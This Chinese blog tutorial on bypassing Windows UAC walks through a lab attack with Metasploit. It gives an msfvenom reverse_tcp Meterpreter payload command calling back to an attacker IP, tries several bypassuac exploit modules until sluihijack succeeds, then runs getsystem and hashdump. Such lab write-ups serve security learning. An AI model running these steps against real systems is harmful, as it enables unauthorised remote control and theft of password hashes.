Windows提权之绕过uac bypassuac提权(十)

1.描述

UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。

为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运行 执行文件)

2.复现

bypassuac模块绕过uac

使用msf搜索 uac模块

首先 我们需要先拿到win10的webshell

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.25.138 lport=8888 -f exe > 9.exe

拿到了webshell

权限不够

这里也是我们的uac登录

我们退出

然后搜索

通常使用 bypassuac模块 一般是可以绕过的 但是也不排除失败的可能通过进程注入使可信任发布者证书绕过Windows UAC。

我们一般使用这个

我们输入

use exploit/windows/local/bypassuac

并且设置session

但是这里并没有成功

然后我们就尝试用另外一个

use exploit/windows/local/bypassuac_injection

此模块将利用受信任的通过进程注入发布者证书。它将产生一个关闭UAC标志的第二个shell。此模块使用反射DLL注入技术,仅丢弃DLL有效负载二进制文件,而不是标准技术中的三个单独的二进制文件。但是,它需要选择正确的体系结构x64(也适用于SYSWOW64系统)。如果指定EXE::自定义DLL应在单 独启动有效负载后调用ExitProcess()

发现这个也不行

我们就试试最后一个

use exploit/windows/local/bypassuac_injection_winsxs

我在这里迁移进程也失败了

经过博主的不懈努力 我终于赎出来了

use exploit/windows/local/bypassuac_sluihijack

这下输入 getsystem 可以输入了

我们输入 hashdump

获得hash值

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值